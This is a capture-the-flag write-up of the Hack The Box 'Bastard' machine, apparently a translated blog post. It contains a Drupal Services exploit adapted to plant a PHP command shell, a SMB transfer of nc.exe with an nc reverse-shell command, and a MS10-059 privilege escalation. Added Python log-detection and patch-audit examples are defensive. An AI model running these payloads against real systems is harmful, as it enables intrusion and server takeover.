家studyをつづって

Notes on what I have studied in IT and security.

【Hack The Box】Bastard

Reconnaissance / scanning

First, I investigate with nmap.

┌──(kali㉿kali)-[~]
└─$ nmap -p- -sC -sV 10.10.10.9  
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-23 14:41 JST
Nmap scan report for 10.10.10.9
Host is up (0.18s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
 
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Port 80 is open.
Opening it in a browser shows a Drupal page.

[Screenshot: the site opened in the browser]

CHANGELOG.txt is also readable.

[Screenshot: CHANGELOG.txt displayed]

This shows that the Drupal version is 7.5.4.

 

In parallel with browsing the site, I ran a few other checks.

Neither nikto nor dirb turned up anything useful here.

nikto
┌──(kali㉿kali)-[~]
└─$ nikto -host http://10.10.10.9
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.9
+ Target Hostname:    10.10.10.9
+ Target Port:        80
+ Start Time:       
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ARRAY(0x5608ccc56a20)
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
+ Entry '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.sqlite.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=comment/reply/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 68 entries which should be manually viewed.
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /README.TXT: This might be interesting...
+ OSVDB-3092: /readme.txt: This might be interesting...
+ OSVDB-3092: /user/: This might be interesting...
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.mysql.txt: Drupal installation file found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ OSVDB-3092: /LICENSE.TXT: License file found may identify site software.
+ 8757 requests: 10 error(s) and 39 item(s) reported on remote host
+ End Time:           2021-06-23 20:50:40 (GMT9) (21122 seconds)
---------------------------------------------------------------------------
 
dirb
┌──(kali㉿kali)-[~]
└─$ dirb http://10.10.10.9
 
-----------------
DIRB v2.22    
By The Dark Raver
-----------------
 
START_TIME: 
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
 
-----------------
 
GENERATED WORDS: 4612                                                          
 
---- Scanning URL: http://10.10.10.9/ ----
+ http://10.10.10.9/0 (CODE:200|SIZE:7583)                                                                                   
+ http://10.10.10.9/admin (CODE:403|SIZE:1233)                                                                               
+ http://10.10.10.9/Admin (CODE:403|SIZE:1233)                                                                               
+ http://10.10.10.9/ADMIN (CODE:403|SIZE:1233)                                                                               
+ http://10.10.10.9/batch (CODE:403|SIZE:1233)                                                                               
==> DIRECTORY: http://10.10.10.9/includes/                                                                                   
+ http://10.10.10.9/index.php (CODE:200|SIZE:7583)                                                                           
+ http://10.10.10.9/install.mysql (CODE:403|SIZE:1233)                                                                       
+ http://10.10.10.9/install.pgsql (CODE:403|SIZE:1233)       
※ Interrupted partway through.
 
gobuster
gobuster dir -u http://10.10.10.9 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -k -o bastard.gobuster
※ Not run.

 

Gaining access

Search for exploit code for Drupal 7.5.4.

┌──(kali㉿kali)-[~]
└─$ searchsploit drupal 7
-------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                              |  Path
-------------------------------------------------------------------------------------------- ---------------------------------
Drupal 4.1/4.2 - Cross-Site Scripting                                                       | php/webapps/22940.txt
Drupal 4.5.3 < 4.6.1 - Comments PHP Injection                                               | php/webapps/1088.pl
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution                                 | php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection                                               | php/webapps/27020.txt
Drupal 5.2 - PHP Zend Hash ation Vector                                                     | php/webapps/4510.txt
Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities                      | php/webapps/11060.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)                           | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)                            | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)                 | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)                 | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)                    | php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities                                                      | php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution                                          | php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution                                     | php/webapps/3313.pl
Drupal < 5.1 - Post Comments Remote Command Execution                                       | php/webapps/3312.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities                                               | php/webapps/33706.txt
Drupal < 7.34 - Denial of Service                                                           | php/dos/35415.txt
Drupal < 7.34 - Denial of Service                                                           | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                    | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                 | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution         | php/webapps/44449.rb
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution         | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)     | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)     | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)            | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (M | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution                              | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution                                          | php/webapps/46459.py
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure                           | php/webapps/44501.txt
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting      | php/webapps/25493.txt
Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)                             | php/webapps/40149.rb
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution                               | php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting                     | php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload              | php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multipl | php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)                           | php/remote/40130.rb
-------------------------------------------------------------------------------------------- ---------------------------------

 

Let's look at the code for 41564.

 

┌──(kali㉿kali)-[~]
└─$ searchsploit -m 41564
  Exploit: Drupal 7.x Module Services - Remote Code Execution
     Path: /usr/share/exploitdb/exploits/php/webapps/41564.php
File Type: ASCII text, with CRLF line terminators
 
Copied to: /home/kali/41564.php
 
 
                                                                                                                              
┌──(kali㉿kali)-[~]
└─$ cat 41564.php 
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Exploit Author: Charles FOL
 
 
#!/usr/bin/php
<?php
# Drupal Services Module Remote Code Execution Exploit
# cf
#
# Three stages:
# 1. Use the SQL Injection to get the contents of the cache for current endpoint
#    along with admin credentials and hash
# 2. Alter the cache to allow us to write a file and do so
# 3. Restore the cache
 
# Initialization
 
error_reporting(E_ALL);
 
define('QID', 'anything');
define('TYPE_PHP', 'application/vnd.php.serialized');
define('TYPE_JSON', 'application/json');
define('CONTROLLER', 'user');
define('ACTION', 'login');
 
$endpoint_path = '/rest_endpoint';
$endpoint = 'rest_endpoint';
 
$file = [
    'filename' => 'dixuSOspsOUU.php',
    'data' => '<?php eval(file_get_contents(\'php://input\')); ?>'
];
※ Remainder omitted
 

Change the parts shown in red above to match your own environment.

The 'data' part is changed as follows.

 

$url = 'http://10.10.10.9';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';


$file = [
    'filename' => 'dixuSOspsOUU.php',
    'data' => '<?php system($_REQUEST["cmd"]); ?>'
];

 

┌──(kali㉿kali)-[~/bastard]
└─$ php 41564.php            
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics 
# Website: https://www.ambionics.io/blog/drupal-services-module-rce

 

#!/usr/bin/php

Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries

File written: http://10.10.10.9/dixuSOspsOUU.php
                                                                                                           
┌──(kali㉿kali)-[~/bastard]
└─$ ls
41564.php  session.json  user.json 

 

Enter the cookie information generated above into the Firefox add-on "Cookie Manager" and access the site again.

[Screenshot: the Firefox add-on "Cookie Manager"]

[Screenshot: "Cookie Manager" settings]

After applying these settings, refreshing the Bastard page gave me access with the administrator's session.

[Screenshot: access with the administrator's session]

 

From here, I saw several articles that upload PHP code to obtain a reverse shell, but in my environment that attack did not work, so I took a different route.

 

Access the file specified in 41564.php as 'filename' => 'dixuSOspsOUU.php', with a parameter appended.

http://10.10.10.9/dixuSOspsOUU.php?cmd=whoami

[Screenshot: command execution]

The command given in the parameter was executed.


Next, run nc on Bastard.

 

Copying nc

┌──(kali㉿kali)-[~/bastard]
└─$ cp /usr/share/windows-binaries/nc.exe /home/kali/bastard/

 

Starting the SMB server

Download Impacket

┌──(kali㉿kali)-[~/bastard]
└─$ sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket 

 

Run the following command in the /opt/impacket directory to start the SMB server.

┌──(kali㉿kali)-[/opt/impacket]
└─$ sudo smbserver.py kali /home/kali/bastard

 

Run the following in the same way as the command executed on Bastard earlier.

http://10.10.10.9/dixuSOspsOUU.php?cmd=copy%20\\10.10.14.14\kali\nc.exe%20nc.exe 

[Screenshot: copying nc]

nc is now copied onto Bastard, so start a listener on Kali and then connect from Bastard again.

http://10.10.10.9/dixuSOspsOUU.php?cmd=nc.exe 10.10.14.29 4444 -e cmd.exe 

 

[Screenshot: console obtained]

Since we do not have SYSTEM privileges, privilege escalation comes next.
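From the defender's side, the requests above leave a clear trail in the IIS logs. The following is an added example, not code from the original post or from the exploit author: it parses a constructed IIS W3C log excerpt (the field order is IIS 7.5's default; the requests mirror the steps of this walkthrough) and flags three things a reviewer would want to see, namely a PHP file in the web root that Drupal 7 does not ship, command-style query parameters, and a UNC path in a query string such as the one used to pull nc.exe over SMB. The sample lines, the allow-list of Drupal root PHP files, and the rule names are my own assumptions.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C log excerpt (not from the original post). The field
# order is the IIS 7.5 default; the requests mirror the steps in the walkthrough.
SAMPLE_LOG = r"""
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2021-08-07 13:28:46 10.10.10.9 GET /index.php - 80 - 10.10.14.14 Mozilla/5.0 200 0 0 120
2021-08-07 13:28:50 10.10.10.9 POST /rest/user/login - 80 - 10.10.14.14 - 200 0 0 310
2021-08-07 13:29:01 10.10.10.9 GET /dixuSOspsOUU.php cmd=whoami 80 - 10.10.14.14 Mozilla/5.0 200 0 0 45
2021-08-07 13:29:30 10.10.10.9 GET /dixuSOspsOUU.php cmd=copy%20\\10.10.14.14\kali\nc.exe%20nc.exe 80 - 10.10.14.14 Mozilla/5.0 200 0 0 900
2021-08-07 13:30:02 10.10.10.9 GET /dixuSOspsOUU.php cmd=nc.exe%2010.10.14.29%204444%20-e%20cmd.exe 80 - 10.10.14.14 Mozilla/5.0 200 0 0 60
"""

# PHP files Drupal 7 legitimately serves from the web root (assumed allow-list);
# anything else directly under / deserves a look, the dropped shell included.
KNOWN_ROOT_PHP = {"/index.php", "/install.php", "/cron.php",
                  "/xmlrpc.php", "/update.php", "/authorize.php"}
CMD_PARAM = re.compile(r"(?:^|&)(?:cmd|exec|command)=", re.I)
# Two leading backslashes, a dotted-quad host, then a share separator.
UNC_PATH = re.compile(r"\\\\\d{1,3}(?:\.\d{1,3}){3}\\")


def parse_iis_log(text):
    """Yield one dict per request line, using the #Fields header for names."""
    fields = None
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if not raw.strip() or raw.startswith("#") or fields is None:
            continue
        parts = raw.split(" ")
        if len(parts) == len(fields):
            yield dict(zip(fields, parts))


def analyze(text):
    """Return a list of findings; each carries the reasons that fired."""
    findings = []
    for rec in parse_iis_log(text):
        stem = rec["cs-uri-stem"]
        # IIS writes '-' for an empty query; decode %20 etc. before matching.
        query = "" if rec["cs-uri-query"] == "-" else unquote(rec["cs-uri-query"])
        reasons = []
        if (stem.lower().endswith(".php") and stem.count("/") == 1
                and stem.lower() not in KNOWN_ROOT_PHP):
            reasons.append("unexpected PHP file in web root")
        if CMD_PARAM.search(query):
            reasons.append("command-style query parameter")
        if UNC_PATH.search(query):
            reasons.append("UNC path in query (possible SMB tool transfer)")
        if reasons:
            findings.append({"time": rec["time"], "client": rec["c-ip"],
                             "path": stem, "query": query, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f["time"], f["client"], f["path"], f["query"], "|", "; ".join(f["reasons"]))
```

Run against the sample, the script reports the three requests to the dropped file and nothing for index.php. The Services REST call itself (the POST to /rest/user/login) is not distinguishable with the default IIS fields, because the Content-Type that matters for that exploit, application/vnd.php.serialized, is not logged; catching that stage needs request-header or WAF logging in front of IIS.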

 

Privilege escalation

To check for vulnerabilities, I use Windows-Exploit-Suggester.

sudo git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git

 

Update the Suggester's database.

python /opt/Windows-Exploit-Suggester/windows-exploit-suggester.py --update

 

Save the output of systeminfo run on Bastard as a text file, move it to Kali, and run the following command.

┌──(kali㉿kali)-[/opt/Windows-Exploit-Suggester]
└─$ sudo python3 ./windows-exploit-suggester.py --database 2021-08-07-mssb.xls --systeminfo /home/kali/bastard/bastard.txt
[*]initiating winsploit version 3.3...
[*]database file detected as xls or xlsx based on extension
[*]attempting to read from the systeminfo input file
[+]systeminfo input file read successfully (utf-8)
[*]querying database file for potential vulnerabilities
[*]comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*]there are now 197 remaining vulns
[+][E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+]windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M]MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M]MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E]MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]  http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]  http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E]MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M]MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M]MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E]MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E]MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M]MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M]MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*]done
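The comparison the suggester performs above, in simplified form, as an added example that is neither the box's real output nor Windows-Exploit-Suggester's own code: it parses constructed systeminfo excerpts and reports which of the elevation-of-privilege bulletins listed in the output above are missing, using the KB numbers the suggester printed in parentheses. Read it as a patch audit: an empty hotfix list, as on this machine, means every bulletin is outstanding. The host name, OS edition and build strings in the samples are placeholders, and the bulletin-to-KB map is limited to the entries on this page.

```python
import re

# KB numbers for the elevation-of-privilege bulletins in the suggester output
# above (the KB is the number in parentheses). A KB absent from the installed
# hotfix list means that bulletin is unpatched. Limited to this page's entries.
EOP_BULLETINS = {
    "MS10-047": "KB981852",
    "MS10-059": "KB982799",
    "MS10-073": "KB981957",
    "MS11-011": "KB2393802",
    "MS13-005": "KB2778930",
}

# Constructed systeminfo excerpts (placeholders, not the box's real output):
# one with no hotfixes at all, as on this page, and one with two KBs applied.
UNPATCHED = """\
Host Name:                 WIN-EXAMPLE
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
"""

PARTLY_PATCHED = """\
Host Name:                 WIN-EXAMPLE
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB982799
                           [02]: KB2778930
Network Card(s):           1 NIC(s) Installed.
"""


def parse_systeminfo(text):
    """Extract OS name and version plus the set of installed KB numbers."""
    info = {"os_name": None, "os_version": None, "hotfixes": set()}
    in_hotfixes = False
    for line in text.splitlines():
        if line.startswith("OS Name:"):
            info["os_name"] = line.split(":", 1)[1].strip()
        elif line.startswith("OS Version:"):
            info["os_version"] = line.split(":", 1)[1].strip()
        if line.startswith("Hotfix(s):"):
            in_hotfixes = True          # entries follow on indented lines
            continue
        if in_hotfixes:
            m = re.match(r"^\s+\[\d+\]:\s*(KB\d+)", line)
            if m:
                info["hotfixes"].add(m.group(1))
                continue
            in_hotfixes = False         # next top-level key ends the list
    return info


def missing_bulletins(info, bulletins=EOP_BULLETINS):
    """Bulletins whose KB is not among the installed hotfixes, sorted by ID."""
    return sorted(b for b, kb in bulletins.items() if kb not in info["hotfixes"])


if __name__ == "__main__":
    for label, text in (("unpatched", UNPATCHED), ("partly patched", PARTLY_PATCHED)):
        info = parse_systeminfo(text)
        print(label, "|", info["os_name"], info["os_version"],
              "| missing:", ", ".join(missing_bulletins(info)) or "none")
```

The real tool does the same matching against Microsoft's full bulletin spreadsheet (the mssb.xls file passed with --database) and also keys on the detected Windows version, which is why it reports far more bulletins than this map; the hotfix-set comparison shown here is the core of what it does and is exactly the check a patch-management audit would run before an attacker does.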

 

Of the results above, I use MS10-059 for privilege escalation.

github.com

 

Running MS10-059.exe on Bastard gave me SYSTEM privileges.

[Screenshot: privilege escalation succeeded]

 

Reference sites

Thank you for the valuable information.

ranakhalil101.medium.com

esseum.com